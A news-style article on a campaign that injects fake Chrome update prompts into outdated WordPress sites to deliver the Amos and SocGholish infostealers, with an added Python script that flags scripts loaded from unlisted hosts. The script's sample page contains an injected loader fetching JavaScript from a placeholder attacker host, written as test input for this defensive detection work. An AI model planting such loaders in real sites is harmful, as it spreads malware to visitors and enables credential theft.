Cybercriminals are taking advantage of outdated WordPress installations and plugins to compromise numerous websites, aiming to deceive visitors into downloading malware, according to cybersecurity researchers.

Understanding the Attack

This active hacking effort, identified by security firm c/side, seeks to propagate malware that can steal credentials and personal information from both Windows and Mac users. Some of the compromised sites are widely visited, putting a large number of users at risk.

The attack employs a broad-scope strategy, attempting to infect anyone visiting these sites rather than focusing on specific individuals or groups. Once a compromised WordPress site is accessed, it briefly displays a counterfeit Chrome browser update, tricking users into downloading malicious files disguised as updates.

Malware Details

The malware involved includes Amos and SocGholish, which attack Mac and Windows systems, respectively. Amos, identified by SentinelOne in May 2023, is an infostealer targeting macOS. It operates under a malware-as-a-service model, sold to attackers who deploy it to pilfer sensitive data such as passwords, cryptocurrency wallets, and other personal information.

Mac security expert Patrick Wardle has pointed out that, despite the detailed victim data it collects, the malware still requires the user to manually bypass Apple's built-in security checks before it can install, so it depends on social engineering rather than on any macOS exploit.

Detection and Response

c/side reports finding more than 10,000 sites affected by this campaign, identified by crawling the web for pages that load the injected scripts and by running reverse DNS lookups to map the domains hosting them. That figure could not be independently confirmed, but at least one compromised site was still serving the malicious content at the time of review.
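The crawling half of that detection work comes down to one check per page: which hosts does the page load JavaScript from, and are any of them unexpected? The script below is an added example, not c/side's tooling or code from the original article. It parses a page's HTML, collects every external `<script src>` and every URL referenced from an inline script (the usual shape of an injected loader that creates a script element pointing at a second stage), and flags any host outside an operator-supplied allowlist. The allowlist, the site hostname and the sample page are constructed for the example; the `.test` hostnames are placeholders, not domains from the campaign. The reverse DNS step is omitted because it needs live lookups.

```python
"""Flag scripts on a WordPress page that load from hosts outside an allowlist.

Added example for a site owner or crawler auditing injected-script campaigns.
Constructed sample data; not c/side's scanner and not code from the article.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # bodies of <script> tags without src=
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src.strip())
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text (CDATA mode).
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


# Absolute or protocol-relative URLs embedded in inline JavaScript.
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>()]+""")


def script_host(url, site_host):
    """Host a script URL resolves to; relative paths resolve to the site itself."""
    return (urlparse(url).netloc or site_host).lower()


def audit_scripts(html, site_host, allowed_hosts):
    """Return findings for scripts loading from hosts outside the allowlist.

    Each finding is (kind, host, evidence): kind is 'external' for a
    <script src> tag or 'inline-loader' for a URL found inside an inline script.
    """
    allowed = {h.lower() for h in allowed_hosts} | {site_host.lower()}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = script_host(src, site_host)
        if host not in allowed:
            findings.append(("external", host, src))
    for body in collector.inline:
        for url in URL_RE.findall(body):
            host = script_host(url, site_host)
            if host not in allowed:
                findings.append(("inline-loader", host, url))
    return findings


# Assumed allowlist for the hypothetical site example-blog.test: its own host
# is added automatically, so only third-party script hosts are listed here.
ALLOWED_SCRIPT_HOSTS = {"cdnjs.cloudflare.com", "www.googletagmanager.com"}

# Constructed sample page: a theme script, a CDN library, a legitimate tag
# manager loader, and an injected loader plus a direct tag pulling from an
# attacker-controlled placeholder host (cdn.bogus-update-lure.test).
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="/wp-content/themes/twentytwentyfour/assets/js/navigation.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script>
(function(w,d,s,l,i){var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');
</script>
</head><body>
<p>Welcome to the blog</p>
<script>
var s=document.createElement('script');
s.src='//cdn.bogus-update-lure.test/loader.js?v='+Date.now();
document.head.appendChild(s);
</script>
<script src="https://cdn.bogus-update-lure.test/chrome-update.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for kind, host, evidence in audit_scripts(SAMPLE_HTML, "example-blog.test", ALLOWED_SCRIPT_HOSTS):
        print(f"{kind:14} {host:32} {evidence}")
```

Run against a real site, fetch the page with an ordinary browser User-Agent and from more than one network, because campaigns of this kind often serve the injected loader only to first-time visitors or to particular client types; a clean fetch from a server in a data center does not prove the page is clean for a home user. Any flagged host is a lead to investigate, not proof of compromise on its own.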

Automattic, the company behind WordPress.com and a major contributor to the WordPress project, has been notified of the malicious domains, although the firm has made no public response regarding these findings.

Security Measures

Users should install browser updates only through the browser's own update mechanism or the vendor's official site, and should install only software they have verified. A Chrome update prompt that appears inside a web page is itself a warning sign, since genuine Chrome updates are never delivered by the sites you visit. Security awareness matters beyond the individual victim: credentials harvested by infostealers have repeatedly been the entry point for larger corporate breaches.

Conclusion

This cybersecurity incident underscores the continuous threat of exploiting WordPress vulnerabilities to deliver malicious software. It highlights the importance of maintaining an updated digital infrastructure and being vigilant about software authenticity.
